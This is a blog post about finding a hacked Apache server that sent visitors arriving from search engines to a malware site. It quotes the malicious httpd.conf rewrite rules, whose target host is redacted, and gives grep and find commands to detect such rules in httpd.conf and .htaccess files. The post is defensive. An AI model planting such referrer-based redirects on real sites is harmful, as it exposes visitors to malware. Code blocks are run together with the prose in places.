Sunday, March 06, 2011
Anu
This happened to a pal of mine just a few days ago, actually, and at first we were convinced someone had hacked Google itself, because the symptoms were that when someone typed in his URL directly, they went to his site, but if they clicked on a search match on Google, they were redirected to a site that attempted to give you a virus.
Digging around a bit, however, and chatting with various people on Twitter.com led us to suspect that there was something wonky with his server, not Google. I mean, in reality, it's pretty darn unlikely that someone's going to hack Google...
Since the malicious redirect wasn't universally experienced, we knew that it couldn't be a DNS hijacking or similar (where your domain name is spontaneously assigned to the IP address of a porn site, etc). So it had to be something on the server itself.
A bit of digging in the httpd.conf Apache web server configuration file revealed the offending code:
What this does is cause queries sent to the server with a referrer of Google, AOL, MSN, Altavista, Ask or Yahoo (e.g., the major search engines) have the query rewritten to be a redirect to the nefarious IP address URL. Definitely not good!RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://nefarious IP address/in.html?s=ipw2 [R,L]
Errordocument 404 http://nefarious IP address/in.html?s=ipw2_err
But how to detect it? Well, one easy way is to just use the Unix/Linux command line tool "grep" to search and quickly view all rewrite rules in your configuration file, screening out those that don't also have "http:" in them. When I do that with my highly complex 2400-line server configuration, here's what I see:
Those are both clean because it's how I let the popular Feedburner service catch my RSS feed URLs. Nothing suspicious like my friend had in his "httpd.conf" file.$ grep -i rewriterule /usr/local/apache/conf/httpd.conf | grep http:
RewriteRule ^/index.xml$ http://feeds.feedburner.com/AskDaveTaylor [R,L]
RewriteRule ^/index.rdf$ http://feeds.feedburner.com/AskDaveTaylor [R,L]
One more tweak and you could have a simple script that would email you if any of this bad code showed up if run from a cron job (Linux geeks know what I'm talking about):
Easy enough, right?
Now it turns out that there's one more sneaky way that a hacker could slip this code onto your server: with a ".htaccess" file in the main directory or a subdirectory of your Web site itself, rather than in the central "httpd.conf" file.
You can check for this from the command line again:
Before you panic on matches, realize that this is also how you most commonly password protect a directory on a Web server. In that instance, the file looks like this:$ cd /usr/local/apache/htdocs
find . -name ".htaccess" -print
Again, you can just look for the "http:" pattern, though this is a bit more complicated a command than last time:AuthUserFile /etc/.htpasswd
AuthGroupFile /dev/null
AuthName "Growing Your Biz w/ Google Course"
AuthType Basic
<Limit GET>
require user taylor
require user google
require user steven
</Limit>
Phew. I'm clean. You should check for this too. In fact, it might be a smart command to add to your simple admin script that I show above.$ grep http: $(find . -name ".htaccess" -print)
$
Hope that helps you out!
Thanks...
Posted in
0 comments:
Post a Comment